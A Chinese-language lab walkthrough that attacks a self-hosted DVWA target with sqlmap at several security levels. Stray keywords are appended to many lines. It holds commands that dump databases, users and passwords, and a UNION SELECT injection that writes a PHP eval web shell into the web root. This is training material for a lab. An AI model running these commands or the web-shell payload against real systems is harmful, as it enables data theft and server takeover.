實驗環境要求: php
一、安裝win7或win10的筆記本或PC電腦一臺,硬盤100GB,內存8GB html
二、安裝VMware® Workstation 14以上 web
整體目標:基於centos7搭建dvwa web服務靶機,使用主機上的瀏覽器和kali虛擬機做爲攻擊機。使用kali中的sqlmap攻擊dvwa上的sql注入和sql盲注漏洞。 sql
任務1、使用kali中的sqlmap攻擊dvwa中sql注入漏洞(low) shell
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0" 數據庫
任務2、使用kali中的sqlmap攻擊dvwa中sql注入漏洞(medium) centos
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0" 瀏覽器
觀察能夠看出爲POST表單 cookie
使用Burp劫獲POST信息 測試
將信息保存成文件
使用文件進行攻擊
任務3、使用kali中的sqlmap攻擊dvwa中sql注入漏洞(high)
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=high;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"
觀察頁面信息爲POST表單
原始方法確定不行,因此再試試剛纔的方法
保持請求
試事後發現失敗
查看源碼後使用二階SQL注入—second-order
拓展任務1、使用kali中的sqlmap攻擊cms中sql注入漏洞
sqlmap -u http://192.168.91.80/cms/show.php?id=1
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –dbs
sqlmap -u http://192.168.91.80/cms/show.php?id=1 -D dvwa –tables
sqlmap -u http://192.168.91.80/cms/show.php?id=1 --dump -D dvwa
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –users
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –passwords
拓展任務2、經過sql注入漏洞獲取sql-shell和os-shell
直接使用命令是錯誤的
咱們須要在靶機修改一些參數來實現
重啓服務
1' union select 1,"<?php @eval($_POST['pass']);?>" INTO OUTFILE "/var/www/html/dvwa/hack.php" #
執行不了說明沒有權限,修改dvwa文件權限